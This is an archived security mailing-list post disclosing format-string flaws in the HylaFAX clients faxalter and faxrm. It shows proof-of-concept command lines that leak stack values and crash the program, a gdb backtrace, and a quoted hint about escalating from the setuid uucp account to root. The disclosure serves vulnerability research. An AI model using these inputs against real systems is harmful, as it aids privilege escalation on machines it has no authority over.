|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: KF (dotslash
snosoft.com)Date: Mon Sep 04 2000 - 03:54:19 CDT
Same deal on Mandrake 8.0...
hylafax-client-4.1-5mdk.i586.rpm
[rootlinux /root]# cat /etc/redhat-release
Linux Mandrake release 8.0 (Traktopel) for i586
[rootlinux /root]# ls -al /usr/bin/faxalter
-rwxr-xr-x 1 root root 13380 Aug 6 2001
/usr/bin/faxalter*
[rootlinux /root]# /usr/bin/faxalter -h %p,%p,%p,%p,%p,%p,%p -D 1
0x804a153,0x401b3290,0x1,0x8048364,0xbffff25c,(nil),0x40015b94: Unknown
host
[rootlinux elguapo]# /usr/bin/faxalter -h %s,%s,%s -D 1
Segmentation fault (core dumped)
[rootlinux elguapo]# gdb /usr/bin/faxalter core
(gdb) bt
#0 0x40209ab7 in vfprintf () from /lib/libc.so.6
#1 0x4020d0f0 in vfprintf () from /lib/libc.so.6
#2 0x40207d7b in vfprintf () from /lib/libc.so.6
#3 0x40066509 in FaxClient::vprintError () from
/usr/lib/libfaxutil.so.4.0.1
-KF
>
> There are some format strings vulnerbilities in the lastest hylafax package
> try faxrm -h %x 1 or faxalter -h %x -D 1 for "proof of concept".
> Both faxrm and faxalter are installed setuid uucp on FreeBSD (installed from
> port collection). uid uucp is not that exciting but with some luck you'll
> find uucp owned binaries running from cron with uid 0.
>
> --
> Sent through GMX FreeMail - http://www.gmx.net
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]